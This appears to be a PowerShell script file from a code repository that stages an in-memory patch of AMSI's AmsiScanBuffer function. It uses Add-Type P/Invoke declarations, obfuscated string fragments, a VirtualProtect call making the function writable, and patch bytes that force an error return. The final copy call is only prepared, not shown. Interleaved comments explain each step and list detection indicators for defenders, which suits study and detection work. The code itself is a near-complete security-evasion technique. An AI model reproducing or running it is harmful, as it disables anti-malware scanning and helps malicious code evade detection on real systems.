Update test/aaa
8772ff5 verified
# NOTE(review): this expression writes a single NUL character to the output
# stream; nothing in the visible lines shows why.
[char]0
# C# source kept in a here-string and compiled into the session by Add-Type
# below. Class W exposes three kernel32 exports to PowerShell through P/Invoke:
# GetProcAddress, LoadLibrary and VirtualProtect. Together they let a script
# resolve the address of a function inside a loaded DLL and change the memory
# protection of the bytes at that address.
#
# Defender notes:
# - A here-string holding [DllImport("kernel32")] declarations for
#   VirtualProtect/GetProcAddress/LoadLibrary that is passed to Add-Type is a
#   high-signal pattern in PowerShell script block logs (Event ID 4104).
# - Constrained Language Mode (enforced through WDAC/AppLocker policy) does not
#   allow Add-Type to compile arbitrary C# like this.
# - On Windows PowerShell 5.1, Add-Type launches the C# compiler as a child
#   process, which is visible in process-creation telemetry.
$W = @"
using System;
using System.Runtime.InteropServices;
public class W {
[DllImport("kernel32")]
public static extern IntPtr GetProcAddress(IntPtr hModule, string procName);
[DllImport("kernel32")]
public static extern IntPtr LoadLibrary(string name);
[DllImport("kernel32")]
public static extern bool VirtualProtect(IntPtr lpAddress, UIntPtr dwSize, uint flNewProtect, out uint lpflOldProtect);
}
"@
# Compile the C# above so the static methods are callable as [W]::Name(...).
Add-Type $W
# Stages an in-memory modification of the Antimalware Scan Interface (AMSI)
# scanning routine inside the current process. These lines require the [W]
# P/Invoke type compiled earlier in the script. The visible lines only prepare
# the values; the call that performs the write is not within this excerpt.
#
# Defender notes:
# - The split strings ("am" + "si.dll", "Amsi" + "Scan" + "Buffer") and the byte
#   sequence B8 57 00 07 80 C3 are recorded verbatim by script block logging
#   (Event ID 4104) and make stable content indicators.
# - Endpoint tooling can detect the result by comparing the in-memory prologue
#   of AmsiScanBuffer with the on-disk amsi.dll image, or by alerting on a
#   protection change to executable pages of amsi.dll.

# Records the current time; $InitialDate is not read in the visible lines.
$InitialDate=Get-Date;
# Obtains a module handle for amsi.dll. The name is assembled from two
# fragments, presumably so the literal never appears whole in the script text.
$L = [W]::LoadLibrary("am" + "si.dll")
# Resolves the address of the AmsiScanBuffer export; the name is split into
# three fragments in the same way.
$A = [W]::GetProcAddress($L, "Amsi" + "Scan" + "Buffer")
# Receives the previous protection value through VirtualProtect's out parameter.
$q = 0
# Requests protection 0x40 (PAGE_EXECUTE_READWRITE) on 5 bytes starting at the
# resolved address, making the start of the function writable.
[W]::VirtualProtect($A, [uint32]5, 0x40, [ref]$q)
# Six bytes that decode on x86/x64 as `mov eax, 0x80070057; ret`. 0x80070057 is
# the E_INVALIDARG HRESULT, so a function starting with these bytes returns that
# error code immediately instead of running its original body.
$P = [Byte[]] (0xB8, 0x57, 0x00, 0x07, 0x80, 0xC3)
# The Marshal type and the method name 'Copy' are held in separate variables,
# presumably so that a direct [Marshal]::Copy call never appears as one
# expression in the script text.
$n = [System.Runtime.InteropServices.Marshal]
$m = 'Copy'
# The remaining values line up with the parameters of
# Marshal.Copy(byte[] source, int startIndex, IntPtr destination, int length):
# source = the byte array, startIndex = 0, destination = the resolved
# AmsiScanBuffer address, length = 6.
$s = ${P}
$i = 0
$d = ${A}
$l = 6